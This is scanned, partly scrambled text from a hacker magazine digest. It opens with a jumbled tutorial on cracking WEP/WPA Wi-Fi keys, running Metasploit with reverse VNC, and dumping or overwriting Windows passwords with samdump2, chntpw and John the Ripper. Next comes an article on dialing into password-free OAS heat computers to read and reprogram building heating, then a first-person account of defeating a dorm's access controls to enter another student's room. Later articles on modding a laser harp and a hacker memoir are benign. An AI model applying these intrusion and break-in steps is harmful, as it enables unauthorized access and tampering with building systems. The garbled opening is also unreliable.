Make sure you specify the path of the wordlist if it’s not in the same directory as the capture file. a lot of time. and use your favorite tools there. or navigate the exploit list that is organized by OS. The last step is to use this data to find the key. but we’re going to keep this section short since everyone has their own preferences. you can just identify which host(s) to scan. If you’re familiar with the options in BackTrack.THE HACKER DIGEST . battery life. if WPA/WPA2. which allows you to divert traffic between the clients you indicate (typically a client and the router) through you. assuming you have one:
aircrack-ng -w [wordlist.org/) This is a great program that tests hosts on the network for known vulnerabilities. Unlike the ten minutes you would spend on WEP. open another xterm window and enter:
aireplay-ng -1 0 -a [bssid] -h ➥ 00:11:22:33:44:55 -e [essid] wifi0
the de-auth/re-auth process to be smooth for the client.000-40. Eventually (typically in the 10. or try moving around a bit if you only have one network of interest.com/) This one is available in BackTrack.VOLUME 26
have clients (aka stations) attached. 10). etc.metasploit. you have plenty of tools in BackTrack 3 to toy with to your heart’s content. from the network you specified. There are many wordlists available online. and [bssid] is the bssid of the network you’re interested in.it/) This program is perfect to just leave running all the time. Once you find one you like. passwords.cap If the network is WEP protected. So now that you have access to all of the networks in the area. The top line of the airodump window has information such as channel. and copy the results to a file called [filename]-01. there is a troubleshooting guide at http://www. If you like. After you get a sense of potential vulnerabilities in Nessus (or use nmap to see which ports are open) you simply load Metasploit (I use the GUI.000 range) you’ll get your key. if it does not find the key. or other networks. such as reverse VNC to have a firewalled machine connect back to you and provide you with the user’s desktop) and then input any other
Next Steps
If this doesn’t work. You can then use the search for whichever terms/ports you want. etc. but also has a Windows version.

for some reason. I find it helpful to run this as well as Cain. which will show you where the Windows system is (i. burner attributes. and more may be controlled– these systems are designed to manipulate and monitor the entire scope of processes involved in space heating. provide the potential for some extremely outlandish hijinx. (Go to the Cracker tab at the top → choose LM&NTLM Hashes on the left → right-click in the body of the page → Add to List → import hashes from a text file → choose your hashes.txt in the directory you’re in. cutoff temperatures at which the OAS will cease to heat the building.txt 2. Such systems do exist. the similarities of their operation would suggest that other brands and versions function in a similar fashion so as to ensure the usefulness of the information within this article
60
. or rewrite. etc. It is simply astonishing what wardialing is still capable of revealing–a technique that has unfortunately lost most of its popularity in the underground. however. by virtue of booting into an alternate OS (that being BackTrack instead of Windows). Boot into BackTrack and then crack with John the Ripper (and your handy dandy wordlist. So. If you do care what the password is. you have a harder task ahead. you now have access to the system security files of Windows and can recover. and don’t want to change it (which would let the user know that the machine’s been compromised). Wireshark (http://www. these attributes. drops one to a command prompt immediately upon connection.txt). In this article. Load the hashes into your new favorite program Cain. simply open an xterm window and type df. the extent of my knowledge regarding said systems shall be detailed only with respect to specific models of OAS heat computers. although they are usually discovered by the oldest and most primitive of processes–the few systems with so little security and so much importance are thus often overlooked and underrated in a hacker culture increasingly geared towards discovery of the cutting-edge. in addition to DSL and other venues. but I’ll leave that for another time. you might need to figure out how to get into your computer in the first place! But luckily. just in case Cain grabs a password and. when exploited clandestinely. Brief.org/) This is also in BackTrack or Windows and is standard packet sniffer. Either will take awhile.VOLUME 26
required metrics such as the IP of the target. Still. After you’ve cd’d to the right folder (as above) and confirmed SAM and system are present:
Samdump2 -o hashes.txt system SAM
Other Next Steps
This creates a file hashes. not the username. interested readers are urged to research boiler operation and water heating more extensively. Heat computers and monitoring/building automation systems of all types comprise one of the few remaining classifications of machines that may still be accessible via phone lines. and yet carries a great deal of significance in the aspect of life administered thereby. minimal explanations of boiler operation and water heating are necessitated by the subject matter of this article and will be provided in due course. If you don’t care what the password is. surviving now primarily as a pastime for casual phreaks. and just want to overwrite it. Hack the Computers! Understanding OAS Heat Computers
by The Philosopher
It is a rare technology indeed that continues to be accessed by dial-up modem.txt ➥ hashes. You can then do a search in Wireshark for the password and find the missing data. the password. and one
of the still scarcer categories of those that do not immediately require a password. all of this is well and good but. some of the only things possible that even begin to compare with the pranks portrayed in the film Hackers (with regard to physical manipulation of buildings remotely). It’s got an easy filter tool as well. IM activity.THE HACKER DIGEST .wireshark. Similar to cracking WPA. head back to your own machine (since this will take some time) and then choose an option: 1. but then you’ll have your password (assuming you have a good wordlist) You can also use Rainbow Tables in Cain. /mnt/hda1) Now just:
cd /mnt/hda1/WINDOWS/system32/config ls #(to make sure you see ➥ the files: SAM and system) chntpw -i SAM system
This will show you the users and ask which you’d like to overwrite. a practice usually called ‘hand scanning’ or simply ‘scanning’. Copy this file to your USB. the temperature of water in the boiler.txt from earlier) john --wordlist=wordlist. in fact. so you can easily target just emails. if you’ve fallen down your stairs and lost your memory. From these computers. who more often than not do it by hand in search of nothing so glamorous or useful as modem carriers to computer systems. As might be expected.e.
If You Can’t Stand the Heat. so that you can see all of the activity on the network.

concluding with a “MODE:” prompt. Upon connection. To make this distinction. Said modem connection to the OAS requires 1200 baud and a 7. i. even parity. OAS claims that these may span three locations–perhaps the 245 and 285 are located in two separate places.P3.T3 = HOURLY TEMPERATURE RECORDS E = EVENTS H = DAILY HISTORY (HA. 68 is the temperature outside at the time of access.XD2. DATE AND ➥ NOTES) SPECIAL KEYS: <?> = HELP <CTRL-C>. and other reported temperature values are not within even remote proximity to 5 degrees or less.P4) T1. water of sufficient quality for human consumption (regardless of actual usage) that is not used to heat a building. _9 and _10 are two additional sensors that report apartment or outside temperatures.1 terminal emulation (7 data bits. provides a plethora of information regarding the boilers under its control to anyone who calls without supplying security credentials (although a password is necessary for programming) and renders possible technology tasks that formerly required access to a thermostat or boiler room.THE HACKER DIGEST . at least.P2. the term.HB = THE ➥ TWO PARTS SEPARATELY) W1. 2008 MODE: 12:49A
Current Report. Typing a question mark will result in the following helpful explanation providing a list of commands and keys that will be used during the session:
MODE: ? COMMANDS: R = CURRENT REPORT S = SET POINTS P = PROGRAMMING (ALSO P1.W3 XD1.D2. in the case of later models. The latter value. Units in other locations may display it differently. though. (this unit has moved since this was set during the installation period. representing the temperature of hot water when “called” domestically and in the coil. drinking. Obviously the former is true in the case of this building. with the values underneath them denoting the temperature at each corresponding location. “DHW” and “CHW” are acronyms for domestic hot water and coil hot water.T3 + E + H + ➥ W1. thus wasting fuel as more is required to achieve the requested temperature. respectively. cooking. thereby lowering the temperature of the water as it travels through the boiler. etc.VOLUME 26
in the instance that one should encounter one other than those specified here. in the following captures) is an attractive target for exploration as it is accessible remotely over a modem (and. OUT is the sensor input for outside air. A “<5*” is indicative of an electrical break/open connection or indeed a temperature below 5 degrees F.W3 = WATER RECORDS D1. I shall elaborate: “R”. since it was accessed in June. a banner similar to the following will be displayed:
CONNECT 1200 OAS Heat Computer 124-5 & 328-12 WEST 12 Tue Jun 24.D3 = T1. and the address is obviously fictitious.e. CHW. changed to preserve the identity of this particular system)–this is the format for New York City. AQS stands for aquastat.T2. As was mentioned previously.T2. Note that this is a street address in the format 124 West 12th St.W2. is necessary to monitor since debris may collect on the outer coil and absorb heat.E. 245A through 285D signify the eight thermistor sensor inputs of the computer (thermistor=thermal resistor: a resistor that varies in electrical resistance with heat). <ESC> = ABORT CURRENT MODE <CTRL-S> = PAUSE TRANSMISSION <CTRL-Q> = RESUME TRANSMISSION <BACKSPACE> = DELETE LINE
The descriptions of commands are fairly cryptic.XD3 = MORE HOURLY RECORDS L = LOGON MESSAGE (ADDRESS AND DATE) V = VERSION (MODEL NUMBER. will print a report of the temperatures of water in various sections of the boiler as well as their status. Examples include tap water used for showering/bathing. DSL over static IP) connection.W2. one stop bit). as the OAS assumes that one is familiar with its administration. cleaning.. “domestic hot water” or DHW refers to potable water used for functions other than space heating. the OAS Heat Computer (version 6310. “MODE:” prompts the user to enter a command. The significance of the arrows seen underneath CHW is that of a “probable electrical open” as according
This will identify the time and date at the location of the unit and the address. this value represents the temperature of the water in the boiler. as seen below (note that commands must be entered in all caps): MODE: R __TIME_245A_245B_245C_245D_285A_ ➥285B_285C_285D____9___10__OUT__ ➥AQS__DHW_CHW_STK 12:49A 77 80 82 78 80 ➥ 74 82 83 <5* <5*| 68 ➥ 194 117 >>> 136 OFF(B) AUT(K) WINTER _BURNER__HEAT___BYP___MAL___BAT__ ➥HI__LO_ 0:03 0:00 0:00 0:00 0:00 ➥ 71 68 0 __H-A__H-W__L-W__H-S_____WTR_ 198 128 113 656 0 TIME is self-explanatory–the time of access.
Current Report
61
.

” several attributes (henceforth referred to as “set points”) of the heat computer may be remotely programmed–this is the venue through which the title of this article may be literally applied. Hydronic systems may exhibit “ON(C)” or “OFF(C)”. logging of this is an instant process. though. or if the burner has been physically controlled from the burner panel located on the heat computer system itself. Set points are as follows:
MODE: S TIME SET POINTS DIAL OUT DAY 5:30A ALARMS___MAL_AQS_ ➥ DHW_BYP_APT_ADC__A7__A8_ EVENING 6:00P ENABLED: ➥N N N N N N N N
Set Points
62
. and “AUT(K)” the status of the key switch in automatic position. it activates the burner in a manual bypass. If in the OFF position. In order to properly operate the burner as corresponds to heat calls. and high/low outside temperatures for the past 14 days. In order to understand the significance of the time value. highest stack temperature and boiler water consumption are daily reports as opposed to the current ones seen above. the
burner has been running for three minutes at the time of access. The redundancy here is simply to facilitate expediency in quick reference of this particular section of the report analysis. a numerical temperature value will be displayed here. which report the status of the circulator pump as on or off. and no malfunctions or bypasses have occurred. Also on this line may be commonly printed an indication of a domestic hot water call. Bypasses will trigger the bypass alarm (see below). and may occur when the key switch has been manually set to the ON position. The next line reports the burner run time. one must understand the method by which the heat computer defines and manages ‘malfunctions’. when the key switch is in automatic position. High aquastat temperature (H-A). either automatic/ digital (the temperature may drop below the programmed threshold. Altering the mode from winter to summer and vice versa is one of the programmable set points of the system. Notice that the burner is in winter mode. Hydronic boilers heat fluid. is placed the burner run time during a period in which the burner is active yet no heat or DHW calls are present. although domestic hot water will be provided still. to a specific temperature and heat a space through the circulation of that hot water or fluid. heat time. high/ low domestic hot water temperature (H-W. and winter mode is that at which the computer will provide heat and function ordinarily. all of the dial-out alarm conditions described below may appear on this line of the report. in the absence of a heat call. HEAT. In automatic position. Following CHW. an unusual condition for a system accessed in June. the burner will activate/deactivate appropriately depending upon the presence of system heat calls. a “timed malfunction” occurs. The malfunction alarm is connected to this circuit and “listens” for flame failure. “Heat call” is simply the term for a request. that is. it could be alternately seen as:
OFF(B) AUT(K) WINTER DHWTR
Furthermore. the likes of which is printed here and logged as an event in the records viewable by the ‘E’ command. as opposed to timed malfunctions which are failures of the burner to activate at all. system bypass. STK represents the temperature of the stack (also commonly referred to as a chimney) of the boiler. Underneath BYP. The circulation pump serves the specific function of returning water to the boiler once its heat has been largely dissipated. The differentiation between hydronic and steam boilers will be made throughout the current report analysis as the OAS Heat Computer handles each respective type of system slightly differently. This key switch serves as a venue to control the most fundamental functions of the heat computer manually and locally–if in the ON position. Summer and winter modes differentiate in that the heat computer will cease to actively provide heat when it is set to the former option. malfunction. for heat. usually water. displays the burner run time during heat calls (an instance of heat being turned off or on is referred to as a heat call. the burner will be switched off and remain unresponsive to heat calls.VOLUME 26
to the electronic manual for the OAS Heat Computer 1000 (the likes of which is packaged with software that will be discussed in the latter half of this article. in addition to OVRD (programmed override) and BAT. As can be concluded from a brief analysis. The “flame failure” circuit is that which will be interrupted if flame is not turned on when called for. bypass.THE HACKER DIGEST . which indicates that the system is currently operating on battery backup.) Usually. L-W). Calls may also occur for domestic hot water. Timed and hardware malfunctions differentiate in that the latter is a failure of flame even when the burner has attempted to produce it. under MAL. necessitating heat) or manual. as noted above. BAT reports the amount of time that the heat computer has been operating on battery backup. or heat time. the OAS Heat Computer temporarily records through its circuitry the burner status. “OFF(B)” reports the status of the burner as off. If a delay in excess of 45 minutes is reported between a call for heat or DHW and the activation of the burner. It appears as if the current outside temperature is the lowest in two weeks. if one is present. as will be seen anon. True to the OAS advertisement pitch of “Be A Control Freak.

the temperature set point for this particular system. the author of this article knew that the number of this particular unit was registered to a certain establishment. The importance of establishing and defining these categories lies in the fact that the OAS determines cutoff temperatures by the time of day.” and so forth. (the number following the asterisk is the dialup for the unit to which the user is connected) nor is it a log of the last four numbers to dial in. the terse list of phone numbers is NOT a directory of dialups to other units. an answering machine picked up with the greeting. this individual system will cease to heat the building actively if the inside temperature during the period of time defined as the day reaches 69 degrees. emergency page. Remember that the purpose of this feature is to notify those in charge of the building. as they concern the machine and not the actual heat or hot water in the building.THE HACKER DIGEST . In fact. is “evening. who are most likely responsible for remote programming of the system as well. the period of time from 5:30 a.m. would be considered “day. the boiler will initiate procedures to actively heat the building. however. INSIDE DAY 69 1. then. Instead. possibly including personal numbers. and http://amazon. This is only logical as analog-to-digital converter and apartment sensor errors are far more likely to be resolved automatically with system resets and other automatic measures. of alarm conditions. when sensed by thermistors. disconnected area sensor. Despite what may be believed to the contrary. Alarms MAL through BYP will dial out after five minutes of the persisting condition. 1800XXXXXXX NIGHT 65 3. and it is not absolutely vital that the building manager be made aware of them immediately.” and “night” by minimum hour. TEMPERATURE SET POINTS DHW 90 A8. and ADC after forty. Often these numbers will seem rather random and unrelated when called. Under “aquastat” are the temperature settings with a permitted differential of ten. heat will be provided if a majority of outside cutoff temperatures are logically opposite the inside as the system is incapable of heating the area outside of a building-therefore.m.
This article will be concluded on page 135
The Best of 2600: A Hacker Odyssey 600-page hardcover book now being sold at booksellers worldwide including Barnes & Noble. to 6:00 p.m. system bypass. The precise purpose and effect of summer/winter mode is unknown and absent from the technical specifications of other versions including the 3500.” “evening. Dial out and alarm conditions follow–the computer will generate an alarm
message in the instance of a burner malfunction. with the alarm time and status. as seen here. Upon calling one of the numbers listed. and/or an analogto-digital converter error. These numbers. Thus. is that summer operation involves the toleration of lower maximum aquastat and cutoff temperatures without activating an alarm by default. A7 and A8 are additional generic alarms that may be connected to external devices.” Case in point. A reasonable assumption. “You’ve reached the Joneses. 55 and 40 degrees.VOLUME 26
NIGHT 10:00P AQS 120 A7. here). here called “Jones Financial”. an aquastat temperature below the specified minimum (120 degrees. excessively low domestic hot water temperature. XXXXXXXXXXX DAY 55 NIGHT 40 SUMMER/WINTER W AQUASTAT DAY NIGHT DIF 190 190 10
Time set points define for the system “day.” from 6:00 p. Borders. (if a beeper/pager number is specified) or electronic message (if sent to a modem). are the temperatures at which.com/2600
63
. APT after ten.m. to 10:00 p. it would do little good to have the computer call the main number(s) of the building itself to report problems. If the heat computer is administering an apartment building. 191XXXXXXXX ATH 0 4. since the outside temperatures are obviously expected to be higher. 1917XXXXXXX EVENING 69 2. the OAS will dial the numbers listed and leave an automated message. OUTSIDE *. could merely be those of people or other places that the owner of the computer has contact with and access to.

In the main area. Each level has an individual who takes care of any reported security issues. There is. however. however. but also how to master their intricacies and achieve a desired end: in this case. a convenience for residents but a security flaw that adds to the pile. but most students are either in classes or clear out of the room for a few hours when it’s cleaning day. Please understand that I did so without malicious intent and only to prove that the system was flawed. While on the ground level. I have no doubt you’re already looking for ways to get around the various security systems. compromises the system.VOLUME 26
Security: Truth Versus Fiction
by RussianBlue
In a world with cable news. It tells you what day the cleaning service comes by to clean the bathroom in each room. Constantly we consider and reconsider the effectiveness of security systems. They only do the bathroom and a quick vacuum. you have to swipe the same card. What has not yet been discussed. The elevator does allow non-swiped service to several levels usable by all students and staff including the ground floor. we look under every rock and peer into each nook and cranny to find that one tiny weakness which. a huge security flaw in a place that touts student security as a main priority. I am a university student living in a campus residence. so you can traverse freely from the main level to the basement. these little flaws go mostly unnoticed by people who aren’t looking for them. internet. you can get it right. Students pay a premium for this security. a simple solution. the basement area. But is this security worth paying extra? As educated hackers. one must show an access card to the security guard who keeps 24-hour watch. Combine this with the previous way to access the elevators and student lounge. And there you will likely have access to the room for as long as you need it
64
. like a very good system and no doubt ensures safety. Though I do not recommend trying to access someone’s residence without their permission at any time. This story begins on ground level. even in the face of overwhelming efforts to cover every crack and patrol every corner? As advanced as they are. To get into the mail room. without a pass. there are stairs that go one level down to the mail room and laundry rooms. they won’t really bother you. and search engines. The solution to this problem. a student would want to go to the same floor as you and punch it in. you need to swipe the card to go to a level where students reside. Theoretically. such as intruders or suspicious activity. The stairs are right next to the security station. People are not allowed on levels 2 or 3. To get into the room. The main elevators also go directly down to the basement level. With this constantly reinforced feeling of danger. Again. doesn’t have security. one must wonder: how much do fancy security measures matter? Is there a way to break the system. pain. This looks. Let me supply my own story of a simple series of seemingly negligible flaws that added up to create a massive failure in the overall scheme of an establishment. is what to do once on the targeted floor. or you might be able to hit the button while their swipe was still active. and an entire floor deemed the student lounge: the second-highest floor in the building. if you were lucky. one must somehow gain access to the elevators before they can even begin to penetrate the system. I “broke in” to a room on a different level than my own. Again. one must swipe their access card.
The first challenge that I faced was the necessity of accessing elevators. on paper. but a hacker is someone who not only knows where the flaws can be found. the stairs up are inaccessible. It takes cleaning about ten to 15 minutes to do a room. it is a system of tiny flaws compounding each other that creates a little doorway through which the canny individual can squeeze and thereby penetrate what many would think impregnable. These stairs are actually concealed from security’s view and therefore provide a free pass around the desk. sought after for a premium. so they were not an option. you need to swipe your access card. But while corporations tout products designed to make you safer. can these systems be beaten? This is the way hackers think. and fear. you need only to catch the cleaners as they are finishing up. I discovered. To get to the elevators in the main level. If you want a quick peek into the room. The building in which I live was converted from a hotel to a student living area. was in the lower level. which are used for conferences. This means that you can get into the elevators from that level without security knowing. I have done the same. Clearly posted by the elevators of each floor is the cleaning schedule for the rooms. Often. If you want access. laundry room. Alone. just walk by and you get your glimpse. the student lounge. I decided to try for a method that would work every time. we are provided with an almost live account of all the terrible things that our world is riddled with: violence. A major selling point for the residence is its security. given careful management of circumstances. or dining area. The next issue is getting onto the level you’re looking for. but as long as you’re patient. to beat the system. no access. however. To access a level of student rooms. Let me assure you. safety and security become precious commodities. If you are in the elevator. This part is more a matter of timing. once again. No card. an obvious security flaw. as this particular residence is probably the most expensive on campus. Thus. and you are free to traverse the floors above the conference levels by way of the stairs. and you have a ticket to every level in the building that you could possibly care about. If you get into the room as the cleaners are leaving.THE HACKER DIGEST . and therefore inaccessible to people without proper credentials.

let’s take a look at the C:\ Documents and Settings\All Users\Documents\ Beamz\Beamz_Music\Get’n Chilly\ directory. .wav. unable to afford much of the security used by corporations and companies. and . the proprietary Beamz application is currently the only software which interfaces with the device. It would seem impossible to create a system that couldn’t be hacked. Obviously the security is not as effective as the residence suggests. The building has almost 1000 residents. There was no trick key. This ever-present ability to hack these systems counteracts the boasts that companies make about their security systems. while my story tells you how to break into a university residence room.wav DRUMSnBASS. People move things in and out all the time.wav file is recorded at the exact same BPM (beats per minute) as the default BPM on your Beamz track. but what it means for safety and security as a whole. Does this mean that security systems are a waste of money? Does it mean that complete safety is impossible? Does it mean that.wav file swap. On the other hand. and nobody will think twice about it. Unfortunately. you can play any of the pre-recorded music segments. Rather than playing the prerecorded Beamz sample. I use the . there’s no way to modify the sound samples within the application itself. to back up the original samples. If you accidentally delete a sound.wav file with the exact same name as the original Beamz file that you renamed. Here’s the problem: although the hardware is solid and. The Beamz is powered via USB. and each of these staff members sees over a hundred faces going in and out per day. be it security for a building or a computer program. even reasonable safety is out of reach for most people? These are not questions for which I profess to have answers.wax extension. or possessions could conceivably be taken. and there were no tools involved. This rather foils the idea of people being able to simply recognize a stranger. you will then be able to hear whatever sound you dropped into the Beamz music directory. Thus. you need only a box to take it out. After editing the files as shown below. documents. It uses laser beams as an interface to trigger music samples in . I hope that you give some thought not to breaking the system. Think not only about where the hole is and what can be done through it. and even if the resident does. and there are good arguments on both sides. or why the cleaning ladies didn’t know that it wasn’t my room. but instead to what breaking this system means.VOLUME 26
Doing this. When you interrupt the laser beams with your hands.wav files in the directory to a different extension.wav MAIN GROOVE. given that many of the people who do live here are new to them every day. you need to rename the . you can make the Beamz into a laser MIDI controller for your own samples.THE HACKER DIGEST . musical instrument called a laser harp. This tutorial will help you modify the sounds which the application triggers so you can edit the sounds which the device can play. but you can use anything you like. As an example.wav INTRO GROOVE. The rooms don’t have safes. Some of you are probably asking why I was not caught by the floor’s other residents. as a stranger.com/)
(available at http:// is a MIDI-controlled. This brings us to an important question which we face in modern society: are the security systems touted by this residence and that apartment really effective enough to guarantee our safety. We know that every system has its weaknesses and therefore can be broken. substitute your own . much less expensive than other laser harps.wav INTRO.wav
The easiest way to drop in your own sample into your laser harp is by a simple . but it would be child’s play to do something more malicious.mid. It makes no sense that in a building that has 24 hour security I was able to access a particular room with only a couple of days of patience and a brain. To do this. but they are something for every hacker to think about when finding holes in security schemes. Then. The following files comprise the rhythm section of the song “Get’n Chilly” in the Beamz application:
BREAKDOWN. As logical people. Security flaw. of locking doors at night or installing an alarm system in our homes. and thus safety. you can always restore the sounds from the Beamz software that shipped with the device.sgt formats. work. The Beamz the default location: C:\Documents and Settings\All Users ➥\Documents\Beamz\Beamz_Music First. The answer here is in the volume of people. Passports. or are they just a ploy to attract potential customers? It’s a dilemma. most of us are experienced hackers. I’m sure we can all appreciate the added security.
Hacking the Beamz
by shotintoeternity
➥thebeamz. go to the Beamz music information in
Editing Process
65
. and a proprietary application and driver control it.wav DRUMS ONLY. I only left my friend a calling card to show off the little feat. Make sure the . Just some food for thought. at $400.

com/hammerhead).wav” EndTime=”1” LoopEnd=”1” /> <Segment File=”CYM 5.wav.wav. check out music software like FruityLoops or Reason. the sound will play once without looping.THE HACKER DIGEST . By swapping these files for your own. The software uses .). In this case.VOLUME 26
To change them.
Advanced Editing
The Beamz music was originally composed using Microsoft DirectMusic Producer software. After substituting my samples with the Beamz built-in samples. This attribute is defined in the Trigger section of the tag. If you need some sources for your samples. For instance.wav” Vol=”-570” EndTime=”1” ➥ LoopEnd=”1” /> </Segments> </Region> </Regions> </Beam> The description of this Beam as “One Shot” indicates that at any point during the sequencing of the Beamz track. Ding hit. and any number of beam attributes can be changed.wav. freely available as a download from Microsoft. which indicates that a number of notes will be played and looped on that particular Beam. I recorded six different drum beats at exactly 97 BPM using some freely available drum machine software called Hammerhead (http://threechords. The files are coded in XML.wav” Vol=”-570” EndTime=”1” ➥ LoopEnd=”1” /> <Segment File=”Ding hit.HB file controls which .40000” ➥ UseTempo=”1” LockPitch=”1” Volume=”-360” DynamicChannels=”0”>
This code gives information about the Beamz track (each with its own unique GUID) to the application. along with the open-source sound editor Audacity (http://audacity.hb files located inside of the Beamz song directories.hb file starts out with an XML tag similar to the one below:
<Program UseBundle=”0” Name=”Get&apos.sgt files. and pitch – you need to edit the . Other sounds are “Pulsed” sounds. you can entirely replace the pre-made samples in the song.wav files with the built-in sounds.000000” BPM=”4” Beat=”4” Tempo=”0.wav and . whereas Groove D 8. For advanced editing of the sounds – including MIDI triggering. frequency.net/). which are very small audio sequences that contain segments of a larger file in addition to standard . you can edit the Segment File attribute to point to your own sounds. Afterwards. Groove A 4.com if you have any questions or are interested in collaborating on this project.mid files. which controls the sound the laser produces. On some songs.wav” Vol=”-370” EndTime=”1” ➥ LoopEnd=”1” /> <Segment File=”CHIMES.sourceforge. the Beam will play one of four . like “Rastafari.n Chilly” Genre=”HipHop” GUID=”9cc86704➥86cf-4b78-a2e9-721819951f27” AudioPath=”StandardMusic.000000” TempoRange=”0. I was able to completely control the rhythm of the song. Please e-mail me at shotintoeternity@gmail.wav is a four measure . When swapping your .” these beats are notated in the names of the .
66
. Data under the <Segments> tag of the . Each .wav files.wav files the Beam will trigger. etc.wav. Each attribute within the tag corresponds to MIDI data.wav files (BellTree hit. you will see code in this general format:
<Beam ID=”256” Name=”Bells N Whistles” Description=”One Shot” PulseRate=”16” PulseTriplet=”0” PulseDelay=”44” StartRate=”0” StartTriplet=”0” StepInterval=”4” StepMult=”1” Mode=”Secondary” Poly=”10” Trigger=”OneShot” Step=”0” FreeWheel=”0” Slave=”0” Master=”0” Volume=”0” TimeShift=”0” NoCutOff=”0” GroupCount=”-1” GroupID=”-2”>
<Regions> <Region Name=”Default” Title=”Bells N Whistles” Comment=”One ➥ Shot”> <Segments> <Segment File=”BellTree hit.aud” ➥ VideoStart=”0.wav is an eight measure .

I could walk around with whatever-you-please on those floppies. From the moment my father. trade. but through it all. And I recall a meeting in the Citicorp Center in 1987. And he was very right. able to connect and transfer data via telephone lines. programs. In 1978. and the weekend visitations I would make to my father’s house. I feel the hardest thing to translate from these old memories is the sense of time. I didn’t know at the time the
67
. all told. given me sustenance and comfort. very unevenly. games finally beaten. brought home what passed for a home computer. was something I picked up from media and what I read. my siblings and I do not share the same accents in our voices. It’s of parties I had my father drive me to to meet online friends. or messages successfully written.THE HACKER DIGEST . which I fashioned on my breastplate and used to shock and ally. But maybe this is one of the biggest mistakes that people make when they look back at the era I was a part of: meeting was fundamental! Modems. I never did. meet the people. “Once you get a floppy drive. the forking of our daily lives and my attachment to this machinery and way of life being so total and complete. standing among kindred spirits. were miraculous things. The Commodore PET.VOLUME 26
Hacker Perspective
Jason Scott
At the time. and it was so much easier just to find a way to travel the distance. remembered-years-hence grind. my scant funds barely able to pay my part of even this inexpensive meal. and computers it is. a between-the-cracks forgotten item from work.” as well. a trip into then-scary NewYork City. now nearly empty from a divorce. a modem. you’ll never go back. I called myself a hacker simply because it was the word that fit. talking of all things technical. were centered around which new item he’d be able to bring to my attention. growing sense of self-worth and character that would only strengthen as diskcopying friends became best friends. working at IBM’s research center in upstate New York. to connect to another person’s computer. I am nearly 40 years old. and a black and white screen barely five inches across.” wide-eyed and nervous. hoping beyond hope that a busy signal wouldn’t respond. a machine bursting with 8k of memory to write programs. it was obvious that I was never looking back to any other choice in life. I was a 16-year-old “hacker. Some of my finest memories of that time are not of cards successfully installed. Even now in the dusk and sunset of the floppy disk. or writings typed out and transferred via phone line to other waiting floppy disks inside floppy disk drives that would write their payload with a churning. stayed permanently. I might add. A person. of careful negotiation of the train system to arrive at a mall in White Plains to quietly wait for friends to arrive at the appointed time. that I’d hear the click of relay that meant a machine. one of them calling himself Emmanuel Goldstein and heading out to a Chinese dinner afterwards. multiple distinct capsules of being and knowing. but I feel like I have lived several lifetimes. be they games. Through it all. and driven me to come out of various shells that sometimes I didn’t even know I had been disguising myself in. is to bring back a flood of memories. To speak of “transferring. occasionally misrepresenting my knowledge or having others misrepresent theirs. but they did so very slowly. these computers were borrowed from work as you might sign out a rare book or artifact. each quietly coming to a close with a physical or mental move into a new direction. With a cassette drive that relied on audio signals to transfer a program over a matter of minutes. my solitary turn. a muddling. that I would likely never meet. machines of plastic and metal and glass have guided my direction.” said the wonderful man who ran the local computer store who I befriended. of phone numbers dialed in the dark of night. was providing me a terrible screech of a carrier that meant it was my turn. it was obvious which one of the three children would make them his life. The “hacker” nomenclature. I recall an Atari game that would take 20 minutes to load by cassette. I remember aimless walks through neighborhoods and streets. Computers it was. however. and duplicate there in person. the distances of minutes that were an expected aspect of the experience at the time. After a dozen or so of these lends. the feeling of holding a solid piece of plastic in my hand and knowing information was on it is still strong in me.

But the conversation. and the potential of their own lives. or attention.com. from my backups. to remember the old but not be trapped by it.I still do.com. Once upon a time. For my father. the delight of suburban space in a beautiful countryside. That’s what matters now. Others. All I knew was that it felt right.” in the end. The idea. just the sight of his own son eating as much as he cared to and facing a life ahead was pleasure itself. They stayed in the back of my mind. held them close. where one glance at a device in their pocket and they know exactly where they stand and not know the fear of being truly lost. Information. For my grandfather. a shorthand to try and reach out to others like yourself and begin a conversation. the information. carefully traded pieces of text. and inspiration that comes from reading missives from another like-minded soul. his father would unnerve him by simply watching him eat dinner quietly. where devices hanging off key chains can contain the entirety of my 1980s collection of information. of hacking.VOLUME 26
long history the spirit of it had or when it truly became a synonym of evil. Imagine a single Google search that was a day’s trip. I browsed around what seemed to have been an infinite collection of information on the Internet. I kept them. To some who are my age. that is. either by laptop or mobile phone or inkjet printing or whatever brings the words to you.. as I read them for the first time 20 years ago. then. were like being given the keys to a city. again a lend from IBM by my father. an immigrant who had lived through some terrible times and had many close relatives lost in war and holocaust. and in no short time it became the way many people knew me. these are memories. these hard-won. a verb. It was. I could tell you what “hacking” is. that would be of interest to a computerobsessed person who wanted to know what was out there.” a Creative Commons licensed documentary on the history of the bulletin board system. So I brought them online. Jason Scott is the webmaster behind textfiles. and let them follow me through my capsules of living. and in my 28th year. a fruitless search. as my father was growing up in the 1940s. these writings and programs and captures and printouts. any at all. is just a word. people writing me to thank me for thinking to collect these artifacts of my youth. That is what mattered. A week barely goes by without some handful of what might be called fan letters. but realize that “hacking. out beyond his seemingly tiny realm of mastered knowledge. a theme. horror. It was a word that felt like an adjective. life was the way it was and his own happiness was seeing his children grow up in the 1970s and 80s with their own removed boundaries. the word served me well. poring over paper copies of The Readers’ Guide to Periodical Literature to find some mention. and later keep them at hand on the many-thousandsof-dollars hard drive I had. when all of us were swept into this wave of technology and changed ourselves forever. the story is where the treasure is. But when information became available to me. to know the next new thing. slow-downloaded. And whether I sought knowledge. Hard drives. a medal. via the bulletin boards (computers with modems attached. of college student and temp worker and art director and system administrator.
68
. I’d print it out. as they entered the homes of my friends and myself. they barely counted up to 40 megabytes. really). often. I’d take commuter rail trains to libraries in larger towns. providing me ten megabytes of storage for whatever shook my fancy. This was textfiles. the delight of seeing the next generation grow up in a world where screens can be touched and react accordingly. a collection of historical documents from most of the networked life of computers. They had taken me years to collect.. and a wasted afternoon save the paperback novel I’d read on my long trip back home. read these files for the first time. It still does. awaiting each new set of folks to come across them. For me. nostalgic guideposts to their own childhoods and early adulthoods. a noun. the spirit of what I call “hacking” is buried in those files. and I think I’ve done a bit of that here. and found these files had not survived the trip. in a general sense. the inexpensiveness of air travel. It felt like a song. Information was meager. to hundreds of thousands of people a month. My father could understand this. not taking his own food but just watching his son eat. or friendship. I sorted them. which we just called textfiles or general files or texts and later textz. I’d save it. with no expectations and the humor.THE HACKER DIGEST . these talismans of information. but he himself had not been through war and did not know loss to such a level. for me. and formed the backbone of my online identity. I am pleased to note. We’d sit on the phone and scope out the future expansion of information we’d be able to sustain on these monsters. a word that got attention and which I felt applied to me . computer information. or bulletin board systems. store it to one of my beloved floppies. He is also the director of “BBS: The Documentary. these are what drive me to keep my eyes open.

69
Phillip Torrone
Virgil Griffith
Martin Eberhard
